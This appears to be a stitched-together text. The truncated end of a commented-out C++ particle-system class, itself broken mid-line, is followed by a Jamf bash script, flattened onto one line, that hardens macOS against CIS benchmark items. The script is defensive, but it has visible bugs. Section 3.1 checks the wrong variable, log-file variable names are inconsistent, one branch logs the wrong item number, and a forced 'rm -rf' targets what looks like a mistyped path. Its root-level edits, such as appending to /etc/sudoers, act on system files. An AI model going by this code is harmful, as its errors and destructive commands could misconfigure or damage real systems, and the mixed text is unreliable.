    std::vector<Particle> mParticlePool;
    std::vector<ParticleAttributes> mParticleAttributes;

    glow::SharedVertexArray mVaoParticle;
    glow::SharedArrayBuffer mVboParticleData;

    glow::SharedShaderStorageBuffer mSsboParticleData;
    glow::SharedShaderStorageBuffer mSsboDeadParticles;
    glow::SharedShaderStorageBuffer mSsboAliveParticles1;
    glow::SharedShaderStorageBuffer mSsboAliveParticles2;

    glow::SharedProgram mProgramComputeParticles;

private:
    long unsigned int mFreeIndex = 0;
    long unsigned int mAlive = 0;
    long unsigned int mMaxGenParticles = 100000;
    long unsigned int mParticleBufferSize = 0;
    int PARTICLE_DATA_LENGTH =
    int INSTANCE_DATA_LENGTH = 17; // 4 * 4 + 1
};
*/
}
#!/bin/bash #################################################################################################### # # Copyright (c) 2017, Jamf, LLC. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the JAMF Software, LLC nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY JAMF SOFTWARE, LLC "AS IS" AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT SHALL JAMF SOFTWARE, LLC BE LIABLE FOR ANY # DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
# #################################################################################################### # written by Katie English, Jamf October 2016 # updated for 10.12 CIS benchmarks by Katie English, Jamf February 2017 # updated to use configuration profiles by Apple Professional Services, January 2018 # github.com/jamfprofessionalservices # updated for 10.13 CIS benchmarks by Erin McDonald, Jamf Jan 2019 # updated for 10.15 CIS benchmarks by Erin McDonald, Jamf 2020 # USAGE # Reads from plist at /Library/Application Support/SecurityScoring/org_security_score.plist by default. # For "true" items, runs query for current computer/user compliance. # Non-compliant items are logged to /Library/Application Support/SecurityScoring/org_audit plistlocation="/Library/Application Support/SecurityScoring/org_security_score.plist" currentUser="$(python -c 'from SystemConfiguration import SCDynamicStoreCopyConsoleUser; import sys; username = (SCDynamicStoreCopyConsoleUser(None, None, None) or [None])[0]; username = [username,""][username in [u"loginwindow", None, u""]]; sys.stdout.write(username + "\n");')" currentUserID="$(/usr/bin/id -u $currentUser)" hardwareUUID="$(/usr/sbin/system_profiler SPHardwareDataType | grep "Hardware UUID" | awk -F ": " '{print $2}' | xargs)" logFile="/Library/Application Support/SecurityScoring/remediation.log" # Append to existing logFile echo "$(date -u)" "Beginning remediation" >> "$logFile" # Create new logFile # echo "$(date -u)" "Beginning remediation" > "$logFile" if [[ ! 
-e $plistlocation ]]; then echo "No scoring file present" exit 0 fi # 1.1 Verify all Apple provided software is current # Verify organizational score Audit1_1="$(defaults read "$plistlocation" OrgScore1_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_1" = "1" ]; then echo "$(date -u)" "1.1 remediated" | tee -a "$logFile" # NOTE: INSTALLS ALL RECOMMENDED SOFTWARE UPDATES FROM CLIENT'S CONFIGURED SUS SERVER softwareupdate -i -r fi # 1.2 Enable Auto Update # Verify organizational score Audit1_2="$(defaults read "$plistlocation" OrgScore1_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_2" = "1" ]; then defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticCheckEnabled -int 1 echo "$(date -u)" "1.2 remediated" | tee -a "$logFile" fi # 1.3 Enable Download new updates when available # Verify organizational score Audit1_3="$(defaults read "$plistlocation" OrgScore1_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_3" = "1" ]; then defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticDownload -int 1 echo "$(date -u)" "1.3 remediated" | tee -a "$logFile" fi # 1.4 Enable app update installs # Verify organizational score Audit1_4="$(defaults read "$plistlocation" OrgScore1_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_4" = "1" ]; then defaults write /Library/Preferences/com.apple.commerce AutoUpdate -bool true echo "$(date -u)" "1.4 remediated" | tee -a "$logFile" fi # 1.5 Enable system data files and security update installs # Verify organizational score Audit1_5="$(defaults read "$plistlocation" OrgScore1_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_5" = "1" ]; then defaults write 
/Library/Preferences/com.apple.SoftwareUpdate ConfigDataInstall -bool true defaults write /Library/Preferences/com.apple.SoftwareUpdate CriticalUpdateInstall -bool true echo "$(date -u)" "1.5 remediated" | tee -a "$logFile" fi # 1.6 Enable macOS update installs # Verify organizational score Audit1_6="$(defaults read "$plistlocation" OrgScore1_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit1_6" = "1" ]; then defaults write /Library/Preferences/com.apple.SoftwareUpdate AutomaticallyInstallMacOSUpdates -bool true echo "$(date -u)" "1.6 remediated" | tee -a "$logFile" fi # 2.1.1 Turn off Bluetooth, if no paired devices exist # Verify organizational score Audit2_1_1="$(defaults read "$plistlocation" OrgScore2_1_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_1_1" = "1" ]; then echo "$(date -u)" "Checking 2.1.1" | tee -a "$logFile" connectable="$( system_profiler SPBluetoothDataType | grep Paired | awk '{print $2}' | head -1 )" if [ "$connectable" = "Yes" ]; then echo "$(date -u)" "2.1.1 passed" | tee -a "$logFile"; else defaults write /Library/Preferences/com.apple.Bluetooth ControllerPowerState -bool false killall -HUP blued echo "$(date -u)" "2.1.1 remediated" | tee -a "$logFile" fi fi # 2.1.3 Show Bluetooth status in menu bar # Verify organizational score Audit2_1_3="$(defaults read "$plistlocation" OrgScore2_1_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_1_3" = "1" ]; then open "/System/Library/CoreServices/Menu Extras/Bluetooth.menu" echo "$(date -u)" "2.1.3 remediated" | tee -a "$logFile" fi ## 2.2.1 Enable "Set time and date automatically" (Not Scored) # Verify organizational score Audit2_2_1="$(defaults read "$plistlocation" OrgScore2_2_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_2_1" = "1" ]; 
then systemsetup -setusingnetworktime on echo "$(date -u)" "2.4.1 remediated" | tee -a "$logFile" fi # 2.2.2 Ensure time set is within appropriate limits # Not audited - only enforced if identified as priority # Verify organizational score Audit2_2_2="$(defaults read "$plistlocation" OrgScore2_2_2)" # If organizational score is 1 or true, check status of client if [ "$Audit2_2_2" = "1" ]; then systemsetup -setusingnetworktime off systemsetup -setusingnetworktime on # timeServer="$(systemsetup -getnetworktimeserver | awk '{print $4}')" # ntpdate -sv "$timeServer" echo "$(date -u)" "2.2.2 enforced" | tee -a "$logFile" fi # 2.3.1 Set an inactivity interval of 20 minutes or less for the screen saver # Verify organizational score Audit2_3_1="$(defaults read "$plistlocation" OrgScore2_3_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_3_1" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/ByHost/com.apple.screensaver."$hardwareUUID".plist idleTime -int 1200 echo "$(date -u)" "2.3.1 remediated" | tee -a "$logFile" fi # 2.3.2 Secure screen saver corners # Verify organizational score Audit2_3_2="$(defaults read "$plistlocation" OrgScore2_3_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_3_2" = "1" ]; then bl_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-bl-corner)" tl_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tl-corner)" tr_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tr-corner)" br_corner="$(defaults read /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-br-corner)" if [ "$bl_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-bl-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a 
"$logFile" fi if [ "$tl_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tl-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a "$logFile" fi if [ "$tr_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-tr-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a "$logFile" fi if [ "$br_corner" = "6" ]; then echo "Disabling hot corner" defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-br-corner 1 /usr/bin/killall Dock echo "$(date -u)" "2.3.2 remediated" | tee -a "$logFile" fi fi # 2.3.3 Familiarize users with screen lock tools or corner to Start Screen Saver # Verify organizational score Audit2_3_3="$(defaults read "$plistlocation" OrgScore2_3_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate # Sets bottom left corner to start screen saver if [ "$Audit2_3_3" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/com.apple.dock wvous-bl-corner 5 echo "$(date -u)" "2.3.3 remediated" | tee -a "$logFile" fi # 2.4.1 Disable Remote Apple Events # Requires Full Disk Access privileges # Verify organizational score Audit2_4_1="$(defaults read "$plistlocation" OrgScore2_4_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_1" = "1" ]; then systemsetup -setremoteappleevents off echo "$(date -u)" "2.4.1 remediated" | tee -a "$logFile" fi # 2.4.2 Disable Internet Sharing # Verify organizational score Audit2_4_2="$(defaults read "$plistlocation" OrgScore2_4_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_2" = "1" ]; then /usr/libexec/PlistBuddy -c "Delete :NAT:AirPort:Enabled" /Library/Preferences/SystemConfiguration/com.apple.nat.plist 
/usr/libexec/PlistBuddy -c "Add :NAT:AirPort:Enabled bool false" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Delete :NAT:Enabled" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Add :NAT:Enabled bool false" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Delete :NAT:PrimaryInterface:Enabled" /Library/Preferences/SystemConfiguration/com.apple.nat.plist /usr/libexec/PlistBuddy -c "Add :NAT:PrimaryInterface:Enabled bool false" /Library/Preferences/SystemConfiguration/com.apple.nat.plist echo "$(date -u)" "2.4.2 enforced" | tee -a "$logFile" fi # 2.4.3 Disable Screen Sharing # Verify organizational score Audit2_4_3="$(defaults read "$plistlocation" OrgScore2_4_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_3" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.screensharing.plist /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop echo "$(date -u)" "2.4.3 remediated" | tee -a "$logFile" fi # 2.4.4 Disable Printer Sharing # Verify organizational score Audit2_4_4="$(defaults read "$plistlocation" OrgScore2_4_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_4" = "1" ]; then /usr/sbin/cupsctl --no-share-printers while read -r _ _ printer _; do /usr/sbin/lpadmin -p "${printer/:}" -o printer-is-shared=false done < <(/usr/bin/lpstat -v) echo "$(date -u)" "2.4.4 remediated" | tee -a "$logFile" fi # 2.4.5 Disable Remote Login # Requires full disk access # Verify organizational score Audit2_4_5="$(defaults read "$plistlocation" OrgScore2_4_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_5" = "1" ]; then /usr/sbin/systemsetup -f -setremotelogin off echo "$(date -u)" "2.4.5 
remediated" | tee -a "$logFile" fi # 2.4.6 Disable DVD or CD Sharing # Verify organizational score Audit2_4_6="$(defaults read "$plistlocation" OrgScore2_4_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_6" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.ODSAgent.plist echo "$(date -u)" "2.4.6 remediated" | tee -a "$logFile" fi # 2.4.7 Disable Bluetooth Sharing # Verify organizational score Audit2_4_7="$(defaults read "$plistlocation" OrgScore2_4_7)" # If organizational score is 1 or true, check status of client and user # If client fails, then remediate if [ "$Audit2_4_7" = "1" ]; then /usr/libexec/PlistBuddy -c "Delete :PrefKeyServicesEnabled" /Users/"$currentUser"/Library/Preferences/ByHost/com.apple.Bluetooth."$hardwareUUID".plist /usr/libexec/PlistBuddy -c "Add :PrefKeyServicesEnabled bool false" /Users/"$currentUser"/Library/Preferences/ByHost/com.apple.Bluetooth."$hardwareUUID".plist echo "$(date -u)" "2.4.7 remediated" | tee -a "$logFile" fi # 2.4.8 Disable File Sharing # Verify organizational score Audit2_4_8="$(defaults read "$plistlocation" OrgScore2_4_8)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_8" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.AppleFileServer.plist launchctl unload -w /System/Library/LaunchDaemons/com.apple.smbd.plist echo "$(date -u)" "2.4.8 remediated" | tee -a "$logFile" fi # 2.4.9 Disable Remote Management # Verify organizational score Audit2_4_9="$(defaults read "$plistlocation" OrgScore2_4_9)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_9" = "1" ]; then launchctl unload -w /System/Library/LaunchDaemons/com.apple.screensharing.plist /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop echo "$(date -u)" "2.4.9 remediated" 
| tee -a "$logFile" fi #2.4.10 Disable Content Caching # Verify organizational score Audit2_4_10="$(defaults read "$plistlocation" OrgScore2_4_10)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_10" = "1" ]; then /usr/bin/AssetCacheManagerUtil deactivate echo "$(date -u)" "2.4.10 remediated" | tee -a "$logFile" fi #2.4.11 Disable Media Sharing # Verify organizational score Audit2_4_11="$(defaults read "$plistlocation" OrgScore2_4_11)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_4_11" = "1" ]; then launchctl unload -w /System/Library/LaunchAgents/com.apple.amp.mediasharingd.plist launchctl disable gui/"$currentUserID"/com.apple.amp.mediasharingd /usr/bin/defaults write /Users/"$currentUser"/Library/Preferences/com.apple.amp.mediasharingd.plist home-sharing-enabled -int 0 /usr/bin/defaults write /Users/"$currentUser"/Library/Preferences/com.apple.amp.mediasharingd.plist public-sharing-enabled -int 0 launchctl kill 9 gui/"$currentUserID"/com.apple.amp.mediasharingd echo "$(date -u)" "2.4.11 remediated - requires restart" | tee -a "$logFile" fi # 2.5.2 Enable Gatekeeper # Verify organizational score Audit2_5_2="$(defaults read "$plistlocation" OrgScore2_5_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_2" = "1" ]; then spctl --master-enable echo "$(date -u)" "2.5.2 remediated" | tee -a "$logFile" fi # 2.5.3 Enable Firewall # Remediation sets Firewall on for essential services # Verify organizational score Audit2_5_3="$(defaults read "$plistlocation" OrgScore2_5_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_3" = "1" ]; then defaults write /Library/Preferences/com.apple.alf globalstate -int 2 echo "$(date -u)" "2.5.3 remediated" | tee -a "$logFile" fi # 2.5.4 Enable Firewall Stealth Mode # Verify 
organizational score Audit2_5_4="$(defaults read "$plistlocation" OrgScore2_5_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_4" = "1" ]; then /usr/libexec/ApplicationFirewall/socketfilterfw --setstealthmode on echo "$(date -u)" "2.5.4 remediated" | tee -a "$logFile" fi # 2.5.5 Review Application Firewall Rules # Verify organizational score Audit2_5_5="$(defaults read "$plistlocation" OrgScore2_5_5)" # If organizational score is 1 or true, check status of client # If client fails, then alert to need of remediation if [ "$Audit2_5_5" = "1" ]; then echo "$(date -u)" "2.5.5 not remediated" | tee -a "$logFile" fi # 2.5.6 Enable Location Services # 2.5.8 Disable sending diagnostic and usage data to Apple # Verify Organizational score Audit2_5_8="$(defaults read "$plistlocation" OrgScore2_5_8)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_5_8" = "1" ]; then AppleDiagn=$(defaults read /Library/Application\ Support/CrashReporter/DiagnosticMessagesHistory.plist AutoSubmit) if [ $AppleDiagn == 1 ]; then defaults write /Library/Application\ Support/CrashReporter/DiagnosticMessagesHistory.plist AutoSubmit -int 0 echo "$(date -u)" "2.5.8 remediated" | tee -a "$logFile" fi fi # 2.5.9 Force Limited Ad Tracking # defaults write /Users/"$currentUser"/Library/Preferences/com.apple.Terminal SecureKeyboardEntry -bool true ? 
# 2.7.1 Time Machine Auto-Backup # Verify organizational score Audit2_7_1="$(defaults read "$plistlocation" OrgScore2_7_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_7_1" = "1" ]; then defaults write /Library/Preferences/com.apple.TimeMachine.plist AutoBackup 1 echo "$(date -u)" "2.7.1 remediated" | tee -a "$logFile" fi # 2.8 Pair the remote control infrared receiver if enabled # Verify organizational score Audit2_8="$(defaults read "$plistlocation" OrgScore2_8)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_8" = "1" ]; then defaults write /Library/Preferences/com.apple.driver.AppleIRController DeviceEnabled -bool false echo "$(date -u)" "2.8 remediated" | tee -a "$logFile" fi # 2.9 Enable Secure Keyboard Entry in terminal.app # Verify organizational score Audit2_9="$(defaults read "$plistlocation" OrgScore2_9)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_9" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/com.apple.Terminal SecureKeyboardEntry -bool true echo "$(date -u)" "2.9 remediated" | tee -a "$logFile" fi # 2.12 Disable "Wake for network access" # Verify organizational score Audit2_12="$(defaults read "$plistlocation" OrgScore2_12)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit2_12" = "1" ]; then pmset -a womp 0 pmset -a powernap 0 echo "$(date -u)" "2.12 remediated" | tee -a "$logFile" fi # 3.1 Enable security auditing # Verify organizational score Audit3_1="$(defaults read "$plistlocation" OrgScore3_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_2" = "1" ]; then echo "$(date -u)" "Checking 3.2" | tee -a "$logFile" auditdEnabled=$(launchctl list | grep -c auditd) if [ "$auditdEnabled" -gt "0" ]; then echo 
"$(date -u)" "3.1.3 passed" | tee -a "$logFile"; else launchctl load -w /System/Library/LaunchDaemons/com.apple.auditd.plist echo "$(date -u)" "3.2 remediated" | tee -a "$logFile" fi fi # 3.2 Configure Security Auditing Flags # Verify organizational score Audit3_2="$(defaults read "$plistlocation" OrgScore3_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_2" = "1" ]; then cp /etc/security/audit_control /etc/security/audit_control_old sed "s/"flags:lo,aa"/"flags:lo,ad,fd,fm,-all"/g" /etc/security/audit_control_old > /etc/security/audit_control chmod 644 /etc/security/audit_control chown root:wheel /etc/security/audit_control echo "$(date -u)" "3.2 remediated" | tee -a "$logFile" fi # 3.3 Ensure security auditing retention # Verify organizational score Audit3_3="$(defaults read "$plistlocation" OrgScore3_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_3" = "1" ]; then cp /etc/security/audit_control /etc/security/audit_control_old oldExpireAfter=$(cat /etc/security/audit_control | egrep expire-after) sed "s/${oldExpireAfter}/expire-after:60d OR 1G/g" /etc/security/audit_control_old > /etc/security/audit_control chmod 644 /etc/security/audit_control chown root:wheel /etc/security/audit_control echo "$(date -u)" "3.3 remediated" | tee -a "$logfile" fi # 3.5 Retain install.log for 365 or more days # Verify organizational score Audit3_5="$(defaults read "$plistlocation" OrgScore3_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_5" = "1" ]; then installRetention="$(grep -i ttl /etc/asl/com.apple.install | awk -F'ttl=' '{print $2}')" if [[ "$installRetention" = "" ]]; then mv /etc/asl/com.apple.install /etc/asl/com.apple.install.old sed '$s/$/ ttl=365/' /etc/asl/com.apple.install.old > /etc/asl/com.apple.install chmod 644 /etc/asl/com.apple.install chown root:wheel 
/etc/asl/com.apple.install echo "$(date -u)" "3.5 remediated" | tee -a "$logfile" else if [[ "$installRetention" -lt "365" ]]; then mv /etc/asl/com.apple.install /etc/asl/com.apple.install.old sed "s/"ttl=$installRetention"/"ttl=365"/g" /etc/asl/com.apple.install.old > /etc/asl/com.apple.install chmod 644 /etc/asl/com.apple.install chown root:wheel /etc/asl/com.apple.install echo "$(date -u)" "3.5 remediated" | tee -a "$logfile" fi fi fi # 3.6 Ensure firewall is configured to log # Verify organizational score Audit3_6="$(defaults read "$plistlocation" OrgScore3_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit3_6" = "1" ]; then /usr/libexec/ApplicationFirewall/socketfilterfw --setloggingmode on echo "$(date -u)" "3.6 remediated" | tee -a "$logFile" fi # 4.1 Disable Bonjour advertising service # Verify organizational score Audit4_1="$(defaults read "$plistlocation" OrgScore4_1)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_1" = "1" ]; then defaults write /Library/Preferences/com.apple.mDNSResponder.plist NoMulticastAdvertisements -bool true echo "$(date -u)" "4.1 remediated" | tee -a "$logFile" fi # 4.2 Enable "Show Wi-Fi status in menu bar" # Verify organizational score Audit4_2="$(defaults read "$plistlocation" OrgScore4_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_2" = "1" ]; then open "/System/Library/CoreServices/Menu Extras/AirPort.menu" echo "$(date -u)" "4.2 remediated" | tee -a "$logFile" fi # 4.4 Ensure http server is not running # Verify organizational score Audit4_4="$(defaults read "$plistlocation" OrgScore4_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_4" = "1" ]; then apachectl stop defaults write /System/Library/LaunchDaemons/org.apache.httpd Disabled -bool true echo "$(date -u)" "4.4 
remediated" | tee -a "$logFile" fi # 4.5 Ensure nfs server is not running # Verify organizational score Audit4_5="$(defaults read "$plistlocation" OrgScore4_5)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit4_5" = "1" ]; then nfsd disable rm -rf /etc/export echo "$(date -u)" "4.5 remediated" | tee -a "$logFile" fi # 5.1.1 Secure Home Folders # Verify organizational score Audit5_1_1="$(defaults read "$plistlocation" OrgScore5_1_1)" # If organizational score is 1 or true, check status of client if [ "$Audit5_1_1" = "1" ]; then # If client fails, then remediate IFS=$'\n' for userDirs in $( find /Users -mindepth 1 -maxdepth 1 -type d -perm -1 | grep -v "Shared" | grep -v "Guest" ); do chmod og-rwx "$userDirs" done echo "$(date -u)" "5.1.1 enforced" | tee -a "$logFile" unset IFS fi # 5.1.2 Check System Wide Applications for appropriate permissions # Verify organizational score Audit5_1_2="$(defaults read "$plistlocation" OrgScore5_1_2)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_1_2" = "1" ]; then IFS=$'\n' for apps in $( find /Applications -iname "*\.app" -type d -perm -2 ); do chmod -R o-w "$apps" done echo "$(date -u)" "5.1.2 enforced" | tee -a "$logFile" unset IFS fi # 5.1.3 Check System folder for world writable files # Verify organizational score Audit5_1_3="$(defaults read "$plistlocation" OrgScore5_1_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_1_3" = "1" ]; then IFS=$'\n' for sysPermissions in $( find /System -type d -perm -2 | grep -v "Public/Drop Box" ); do chmod -R o-w "$sysPermissions" done echo "$(date -u)" "5.1.3 enforced" | tee -a "$logFile" unset IFS fi # 5.1.4 Check Library folder for world writable files # Verify organizational score Audit5_1_4="$(defaults read "$plistlocation" OrgScore5_1_4)" # If organizational score is 1 or true, check status of 
client # If client fails, then remediate if [ "$Audit5_1_4" = "1" ]; then # Exempts Adobe files by default! # for libPermissions in $( find /Library -type d -perm -2 -ls | grep -v Caches ); do IFS=$'\n' for libPermissions in $( find /Library -type d -perm -2 | grep -v Caches | grep -v Adobe | grep -v VMware); do chmod -R o-w "$libPermissions" done echo "$(date -u)" "5.1.4 enforced" | tee -a "$logFile" unset IFS fi # 5.3 Reduce the sudo timeout period # Verify organizational score Audit5_3="$(defaults read "$plistlocation" OrgScore5_3)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_3" = "1" ]; then echo "Defaults timestamp_timeout=0" >> /etc/sudoers echo "$(date -u)" "5.3 remediated" | tee -a "$logFile" fi # 5.4 Use a separate timestamp for each user/tty combo # Verify organizational score Audit5_4="$(defaults read "$plistlocation" OrgScore5_4)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_4" = "1" ]; then sed -i ".old" '/Default !tty_tickets/d' /etc/sudoers chmod 644 /etc/sudoers chown root:wheel /etc/sudoers echo "$(date -u)" "5.4 remediated" | tee -a "$logFile" fi # 5.5 Automatically lock the login keychain for inactivity # 5.6 Ensure login keychain is locked when the computer sleeps # If both 5.5 and 5.6 need to be set, both commands must be run at the same time # Verify organizational score Audit5_5="$(defaults read "$plistlocation" OrgScore5_5)" Audit5_6="$(defaults read "$plistlocation" OrgScore5_6)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_5" = "1" ] && [ "$Audit5_6" = 1 ]; then echo "$(date -u)" "Checking 5.5 and 5.6" | tee -a "$logFile" security set-keychain-settings -l -u -t 21600s /Users/"$currentUser"/Library/Keychains/login.keychain echo "$(date -u)" "5.5 and 5.6 remediated" | tee -a "$logFile" elif [ "$Audit5_5" = "1" ] && [ "$Audit5_6" = 0 ]; then echo 
"$(date -u)" "Checking 5.5" | tee -a "$logFile" security set-keychain-settings -u -t 21600s /Users/"$currentUser"/Library/Keychains/login.keychain echo "$(date -u)" "5.5 remediated" | tee -a "$logFile" elif [ "$Audit5_5" = "0" ] && [ "$Audit5_6" = 1 ]; then echo "$(date -u)" "Checking 5.6" | tee -a "$logFile" security set-keychain-settings -l /Users/"$currentUser"/Library/Keychains/login.keychain echo "$(date -u)" "5.6 remediated" | tee -a "$logFile" fi # 5.7 Do not enable the "root" account # Verify organizational score Audit5_7="$(defaults read "$plistlocation" OrgScore5_7)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_7" = "1" ]; then dscl . -create /Users/root UserShell /usr/bin/false echo "$(date -u)" "5.7 remediated" | tee -a "$logFile" fi # 5.8 Disable automatic login # Verify organizational score Audit5_8="$(defaults read "$plistlocation" OrgScore5_8)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_8" = "1" ]; then defaults delete /Library/Preferences/com.apple.loginwindow autoLoginUser echo "$(date -u)" "5.8 remediated" | tee -a "$logFile" fi # 5.9 Require a password to wake the computer from sleep or screen saver # Verify organizational score Audit5_9="$(defaults read "$plistlocation" OrgScore5_9)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_9" = "1" ]; then defaults write /Users/"$currentUser"/Library/Preferences/com.apple.screensaver askForPassword -int 1 echo "$(date -u)" "5.9 remediated" | tee -a "$logFile" fi # 5.10 Ensure system is set to hibernate # Verify organizational score Audit5_10="$(defaults read "$plistlocation" OrgScore5_10)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_10" = "1" ]; then pmset -a standbydelayhigh 600 pmset -a highstandbythreshold 90 pmset -a highstandbythreshold 90 
pmset -a destroyfvkeyonstandby 1 echo "$(date -u)" "5.10 remediated" | tee -a "$logFile" fi # 5.11 Require an administrator password to access system-wide preferences # Verify organizational score Audit5_11="$(defaults read "$plistlocation" OrgScore5_11)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_11" = "1" ]; then security authorizationdb read system.preferences > /tmp/system.preferences.plist /usr/libexec/PlistBuddy -c "Set :shared false" /tmp/system.preferences.plist security authorizationdb write system.preferences < /tmp/system.preferences.plist echo "$(date -u)" "5.11 remediated" | tee -a "$logFile" fi # 5.12 Disable ability to login to another user's active and locked session # Verify organizational score Audit5_12="$(defaults read "$plistlocation" OrgScore5_12)" # If organizational score is 1 or true, check status of client # If client fails, then remediate if [ "$Audit5_12" = "1" ]; then /usr/bin/security authorizationdb write system.login.screensaver "use-login-window-ui" echo "$(date -u)" "5.12 remediated" | tee -a "$logFile" fi # 5.13 Create a custom message for the Login Screen # Verify organizational score Audit5_13="$(defaults read "$plistlocation" OrgScore5_13)" # If organizational score is 1 or true, check status of client if [ "$Audit5_13" = "1" ]; then PolicyBannerText="CIS mandated Login Window banner" defaults write /Library/Preferences/com.apple.loginwindow.plist LoginwindowText -string "$PolicyBannerText" echo "$(date -u)" "5.13 remediated" | tee -a "$logFile" fi # 5.14 Create a Login window banner # Policy Banner 